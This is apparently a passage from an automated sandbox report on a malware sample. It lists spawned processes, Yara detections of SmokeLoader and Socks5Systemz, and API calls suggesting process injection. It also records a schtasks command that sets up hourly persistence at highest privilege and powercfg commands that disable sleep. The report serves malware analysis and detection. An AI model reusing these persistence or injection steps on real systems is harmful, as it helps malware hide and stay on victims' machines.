Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	08:48:33
Start date:	21/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	08:48:36
Start date:	21/09/2024
Path:	C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe" -i
Imagebase:	0x400000
File size:	2'801'664 bytes
MD5 hash:	8C1835DABEA53E9D98E866C950CD260D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000023.00000002.2812741708.0000000002D0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000023.00000002.2813195969.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	08:48:37
Start date:	21/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	08:48:40
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe"
Imagebase:	0x8c0000
File size:	4'249'600 bytes
MD5 hash:	ABDBCC23BD8F767E671BAC6D2FF60335
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	08:48:42
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Imagebase:	0x630000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	08:48:42
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	08:48:45
Start date:	21/09/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff6eefc0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	08:48:45
Start date:	21/09/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff6eefc0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	08:48:45
Start date:	21/09/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff6eefc0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	08:48:45
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	08:48:45
Start date:	21/09/2024
Path:	C:\ProgramData\jewkkwnf\jewkkwnf.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\jewkkwnf\jewkkwnf.exe
Imagebase:	0x9d0000
File size:	4'249'600 bytes
MD5 hash:	ABDBCC23BD8F767E671BAC6D2FF60335
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs Detection: 33%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	08:48:45
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	08:49:40
Start date:	21/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 04C36630 Relevance: 82.4, Strings: 65, Instructions: 1162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 04C37383
4, xrefs: 04C375B6
T, xrefs: 04C3724F
5, xrefs: 04C36955
>, xrefs: 04C37C2A
Z, xrefs: 04C36DAD
U, xrefs: 04C375F0
^, xrefs: 04C3686D
U, xrefs: 04C36BCD
-, xrefs: 04C37BBA
>, xrefs: 04C3681A
Z, xrefs: 04C37D34
4, xrefs: 04C3710F
^, xrefs: 04C3729B
P, xrefs: 04C36899
:, xrefs: 04C36877
>, xrefs: 04C367DE
4, xrefs: 04C36B93
&, xrefs: 04C3759C
-, xrefs: 04C36C6B
P, xrefs: 04C372C7
>, xrefs: 04C37698
4, xrefs: 04C36735
Z, xrefs: 04C37329
>, xrefs: 04C37BC6
:, xrefs: 04C372A5
>, xrefs: 04C37245
Z, xrefs: 04C368FB
-, xrefs: 04C371E7
-, xrefs: 04C3768E
5, xrefs: 04C37DA0
>, xrefs: 04C36CC9
:, xrefs: 04C3774C
P, xrefs: 04C37CC2
P, xrefs: 04C36D4B
[, xrefs: 04C367D0
U, xrefs: 04C37149
&, xrefs: 04C36B79
>, xrefs: 04C36C75
^, xrefs: 04C36D1F
&, xrefs: 04C37AB6
U, xrefs: 04C37B0A
T, xrefs: 04C37C36
^, xrefs: 04C37C8E
[, xrefs: 04C36C61
5, xrefs: 04C3782A
U, xrefs: 04C36763
[, xrefs: 04C371DD
>, xrefs: 04C376EC
:, xrefs: 04C36D29
[, xrefs: 04C37BAE
&, xrefs: 04C370F5
-, xrefs: 04C367D7
[, xrefs: 04C37684
^, xrefs: 04C37742
P, xrefs: 04C3776E
:, xrefs: 04C37C9A
5, xrefs: 04C36E07
Z, xrefs: 04C377D0
T, xrefs: 04C36821
T, xrefs: 04C36CD3
T, xrefs: 04C376F6
4, xrefs: 04C37AD0
&, xrefs: 04C36721
>, xrefs: 04C371F1

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: &$&$&$&$&$-$-$-$-$-$4$4$4$4$4$5$5$5$5$5$:$:$:$:$:$>$>$>$>$>$>$>$>$>$>$P$P$P$P$P$T$T$T$T$T$U$U$U$U$U$Z$Z$Z$Z$Z$[$[$[$[$[$^$^$^$^$^
API String ID: 0-2631824096
Opcode ID: fdc6bbb14d60d8d90860ba5cbbfb4cde46a8187ba13c784f17a4a6cf3518c566
Instruction ID: 1c9cbade5a2f1d3f66a7b024842cecc635f20791415a63e508282299948e8d33
Opcode Fuzzy Hash: fdc6bbb14d60d8d90860ba5cbbfb4cde46a8187ba13c784f17a4a6cf3518c566
Instruction Fuzzy Hash: 8ED2D2B4D01A298FDB64DF29DD447AABBB2BB89301F1081E9D40CA7355DB799E81CF04

Function 04C32240 Relevance: .8, Instructions: 827COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cce8b1ab388acde3483e716349ef38ebfabd79b504bf16d549c3a8c9d1d200d
Instruction ID: dc765b77515f120cc7159aab505457b915adb493f3460dab24ac81d02bb289cf
Opcode Fuzzy Hash: 2cce8b1ab388acde3483e716349ef38ebfabd79b504bf16d549c3a8c9d1d200d
Instruction Fuzzy Hash: 09627F35B00215DFDF14DF69D884AADB7B3BF88711B1581A9E816AB360DB31ED42CB90

Function 04C35EFA Relevance: .4, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e7181741fe6aed459619830f29ac96653ef2e681e92de0831e333b3fc961d44
Instruction ID: d6056f6d96ff4f9c11514771dc3fa854c9c1e34cd42577e84f2da07f92c03340
Opcode Fuzzy Hash: 3e7181741fe6aed459619830f29ac96653ef2e681e92de0831e333b3fc961d44
Instruction Fuzzy Hash: 17F1B435B00215EFDB25DF64C5846AE7BB3BF85302F158069E845AB2A1DB31FD42CB91

Function 04C30839 Relevance: .4, Instructions: 408
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1908ae5b0c9dcd756bdbade1ddcb039a5f2d6fbe7ce21849fbbfcbe768e702f
Instruction ID: 956e65ce02f6ed9e068c97b2c0d7cb038b6a7749851dfbe834040a1ffa68560a
Opcode Fuzzy Hash: e1908ae5b0c9dcd756bdbade1ddcb039a5f2d6fbe7ce21849fbbfcbe768e702f
Instruction Fuzzy Hash: A722D574A00218DFDB24EFA0D950BADBBB2FF89300F1085A9D9096B365DB355D85DF50

Function 04C30848 Relevance: .4, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f1bfaf85550b330d0d3cfdefc2726583f4fe6574a0fe52035323b710d94dc5
Instruction ID: 636f88c330b0957b7443aa11607c751b54cc2b9814af56f2b47e41f59850a538
Opcode Fuzzy Hash: 22f1bfaf85550b330d0d3cfdefc2726583f4fe6574a0fe52035323b710d94dc5
Instruction Fuzzy Hash: 3612D574A00218DFDB24EFA0D950BAEBBB2FF89300F1085A9D9096B365DB355D85DF50

Function 04E30A18 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E30CDF

Memory Dump Source

Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f95f5fd48c59ee9d13f4b5b63557bc8a83746d6a3aa6c608cc401ca6abccebca
Instruction ID: 3fbaeefeceab6b5e253fe323c958452b31c5066422df2b49033bb1a1ff95a745
Opcode Fuzzy Hash: f95f5fd48c59ee9d13f4b5b63557bc8a83746d6a3aa6c608cc401ca6abccebca
Instruction Fuzzy Hash: C1C11671D002298FDF25CFA9C844BEEBBB1BF49304F0095A9D449B7244DB74AA85CF95

Function 04E30690 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E30763

Memory Dump Source

Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9e74fd0cc092acd8e6cfe9ef79733ab4774e88e7090f88da2bb58cdd818c9ecc
Instruction ID: 287c5893e4c4f2b561e2eacaad1cdccddb014e03b7934120fe59606ee5d18874
Opcode Fuzzy Hash: 9e74fd0cc092acd8e6cfe9ef79733ab4774e88e7090f88da2bb58cdd818c9ecc
Instruction Fuzzy Hash: 614198B5D012589FDF00DFA9D984AEEBBF1BF49310F14902AE818B7240D779AA45CF64

Function 04E307E8 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E3089A

Memory Dump Source

Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4d14eb96f7104e5732880d30e3ac0292861c86773c49968d29f96295b931b07c
Instruction ID: 29835e1943f74915f23b16ca75eb765d3a4dd06cbe6ee045bd93cad1fbd7f05b
Opcode Fuzzy Hash: 4d14eb96f7104e5732880d30e3ac0292861c86773c49968d29f96295b931b07c
Instruction Fuzzy Hash: 3541A9B5D042589FDF10CFAAD884AEEFBB1BF09310F10A42AE814B7240D775A945CF68

Function 04E30168 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E30212

Memory Dump Source

Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f9587d324e777e06542851bd37dbf393b67eaf70b922132ae2b0492fc356b01e
Instruction ID: 26074ab26d6fad40250a43b9a09624f67a82382b44f065d1270a3f2f56354ae6
Opcode Fuzzy Hash: f9587d324e777e06542851bd37dbf393b67eaf70b922132ae2b0492fc356b01e
Instruction Fuzzy Hash: B531A6B9D042589FCF10CFA9D884AEEFBB5BB49310F10A42AE814B7200D775A945CF68

Function 04E30040 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 04E300EF

Memory Dump Source

Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4ea33fd2deec8fe092b7040a188d8fd4ef0fd2cdce8021682be3e53ca249f07c
Instruction ID: 73e1e6abec8a596b357c46562356cf997fd8529b2bf5e6d3a78c41204c22f6da
Opcode Fuzzy Hash: 4ea33fd2deec8fe092b7040a188d8fd4ef0fd2cdce8021682be3e53ca249f07c
Instruction Fuzzy Hash: 3031CDB5D012589FDB10CFAAD884AEEFBF0BF49314F14906AE418B7240D779A985CF64

Function 04C3FE52 Relevance: 1.6, APIs: 1, Instructions: 76
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 04C3FED6

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7e72cb5e9ff51c0c2535a1d16f69d8474deefc1786606bb765612a3c3bef6606
Instruction ID: 0c6c6e361c8e750eb46059dce2b1d63ac4486099c6096313ac3bee224d4ff78b
Opcode Fuzzy Hash: 7e72cb5e9ff51c0c2535a1d16f69d8474deefc1786606bb765612a3c3bef6606
Instruction Fuzzy Hash: 8531EBB5D012589FDB10CFAAD881AEEFBB1BF49310F14946AE814B7300C774A941CFA4

Function 04C3FE58 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 04C3FED6

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 62d07cf530a117f7e836156f4ecfda3d5f95ff17084a259ec360aa9d4db6a022
Instruction ID: e8725f4e0b191499945b18df527aba4226027dd9eada2beac24653a356e1407f
Opcode Fuzzy Hash: 62d07cf530a117f7e836156f4ecfda3d5f95ff17084a259ec360aa9d4db6a022
Instruction Fuzzy Hash: 8231C9B5D012589FDB10CFAAD880AEEFBB5AB49310F14946AE814B7300C775A941CFA8

Non-executed Functions

Function 04C3C56C Relevance: 3.9, Strings: 3, Instructions: 159COMMON

Download Yara Rule

Strings

UUUU, xrefs: 04C3C671
X$c{, xrefs: 04C3C755
UUUU, xrefs: 04C3C5A7

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: UUUU$UUUU$X$c{
API String ID: 0-153604399
Opcode ID: e50b0e5d82009fcd08ee19484bb32409f72aef3f8697494a06b432c944379685
Instruction ID: ffd8d958c6e195c0e91cddb23a0b2e057540809497a0d66500310c1163cdfd92
Opcode Fuzzy Hash: e50b0e5d82009fcd08ee19484bb32409f72aef3f8697494a06b432c944379685
Instruction Fuzzy Hash: EC819171E102289FDB64CFA9C981B9DFBF2BF89300F1481A9E54CE7255D7349A858F01

Function 04E15DF1 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b1cd8d7e042b36d1f1ea047f1cfa04c210e08b92655a8bc4a54ba75b45013f1
Instruction ID: 98318eacb113a99ce70ce6915ff7ebe4a5f17dfa9f7550389ae62e04640bc887
Opcode Fuzzy Hash: 8b1cd8d7e042b36d1f1ea047f1cfa04c210e08b92655a8bc4a54ba75b45013f1
Instruction Fuzzy Hash: 16B1CDA289E3D05FE7138770597A6907FB26E13214B1F89DBC8C1DF0A3D2495A5AD332

Function 04C38F4F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bab73fb131916ef413e65488d0a1abb3125254599721a66277489936711ef96
Instruction ID: ec45ca5a8cd1f09cba95cd3c5132f20a06901bdbe14300b18b93b0f037490e2a
Opcode Fuzzy Hash: 8bab73fb131916ef413e65488d0a1abb3125254599721a66277489936711ef96
Instruction Fuzzy Hash: AC516F70A19209CFDB45EFB6E84069E7BF2FFC6310F04C129D004AB3A5EBB559068B90

Function 04C38F60 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 062cc1744098e3910b0579f96bdac96ad7f295281e62b779a8e25fd65f1e0401
Instruction ID: 9e5453811ff31cde62405a12b45474eb30f1304ff3c88bef5bc457d05bee0e9a
Opcode Fuzzy Hash: 062cc1744098e3910b0579f96bdac96ad7f295281e62b779a8e25fd65f1e0401
Instruction Fuzzy Hash: BC514D70A19209CFDB45DFBAE84069EBBF2FFC9310F14C129D004AB3A5EBB559068B55

Analysis Process: RegAsm.exePID: 7504, Parent PID: 7436COMMON

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	94

Executed Functions

Function 004CEF10 Relevance: 68.8, APIs: 16, Strings: 22, Instructions: 2340sleepprocessCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004CF133

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 004CF26D
Sleep.KERNEL32(000000C8,?,?,?), ref: 004CFB61
Sleep.KERNEL32(?), ref: 004CFB8A
GetBinaryTypeA.KERNEL32(00000000,FFFFFFFF), ref: 004CFBB4
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004D0070
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004D0081
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004D008E
GetBinaryTypeA.KERNEL32(?,FFFFFFFF,?), ref: 004D02B0
Sleep.KERNEL32(000000C8), ref: 004D04AD
Sleep.KERNEL32(00000000), ref: 004D04D6
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004D0999
CloseHandle.KERNEL32(?), ref: 004D09AA
CloseHandle.KERNEL32(?), ref: 004D09B7
__aulldiv.LIBCMT ref: 004D1307
ShellExecuteA.SHELL32(00000000,?,?,?,00000000,?), ref: 004D14AC

Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF

Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1

Strings

M, xrefs: 004D04F3
eks, xrefs: 004CF378, 004CFCCD, 004CFDD9, 004D016E, 004D059C, 004D06A8, 004D0AAD, 004D0AF7, 004D1177, 004D11B2, 004D16C6, 004D1710
E, xrefs: 004D0EDE
!jwj, xrefs: 004CFC3D
B, xrefs: 004D02DE
6|tt, xrefs: 004D0C52
), xrefs: 004D0ED2
j3l6lrek, xrefs: 004CF41F, 004CF469, 004CFD74, 004CFDBE, 004CFE80, 004CFECA, 004D0215, 004D025F, 004D0643, 004D068D, 004D074F, 004D0799, 004D0B9E, 004D0BE8, 004D1259, 004D12A3, 004D17B7, 004D1801
D, xrefs: 004CFEF8
., xrefs: 004D02D2
$, xrefs: 004D0CD4
K, xrefs: 004CF815
M, xrefs: 004D04FB
B, xrefs: 004D02E2
D, xrefs: 004D07C7
J, xrefs: 004D02DA
P, xrefs: 004D04F7
v, xrefs: 004D13EF
E, xrefs: 004D0EDA
M, xrefs: 004D0ED6
mOA, xrefs: 004D10AD
(, xrefs: 004D04EB

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$CloseExclusiveHandleLockSleep$AcquireBinaryCreateProcessReleaseType$ConditionExecuteShellVariableWake
String ID: !jwj$$$($)$.$6|tt$B$B$D$D$E$E$J$K$M$M$M$P$eks$j3l6lrek$mOA$v
API String ID: 469071346-4142521700
Opcode ID: 10c079741a010cbc27c3b25f10ff34d316d84ab10b3ce49be593139cf8c96b2c
Instruction ID: 25b4dd716968d004817c252c2393c646fb2409f2773173bf43e65d163309b470
Opcode Fuzzy Hash: 10c079741a010cbc27c3b25f10ff34d316d84ab10b3ce49be593139cf8c96b2c
Instruction Fuzzy Hash: 1B4335709042688FDB25CB64CC94BEEBBB1BF49304F0481EAD54967381DB386E89CF59

Function 00437B10 Relevance: 47.1, APIs: 2, Strings: 23, Instructions: 3321COMMON

Download Yara Rule

Strings

r, xrefs: 0043AC61
S72'2, xrefs: 004391E7
e`u`, xrefs: 00438B0E
|, xrefs: 0043AEE9
kn{n, xrefs: 00438D51
https://ipgeolocation.io/, xrefs: 0043B84C
-NN, xrefs: 0043AE45
|, xrefs: 0043AEE5
k, xrefs: 0043AD36
@, xrefs: 0043BE34
/F_, xrefs: 00438058
k, xrefs: 00439755
/, xrefs: 0043B7CE
k, xrefs: 0043AC65
S=2>6, xrefs: 0043938D
Content-Type: application/x-www-form-urlencoded, xrefs: 00437D2A, 00437D7F, 00439C12, 00439C67, 0043AB73
*NK^K, xrefs: 00439011
4]D, xrefs: 00438131
lcog, xrefs: 00438EF7
I-(=(, xrefs: 00439609
B&#6#, xrefs: 00438842
https://ipinfo.io/, xrefs: 00438555
p, xrefs: 004388EA

Memory Dump Source

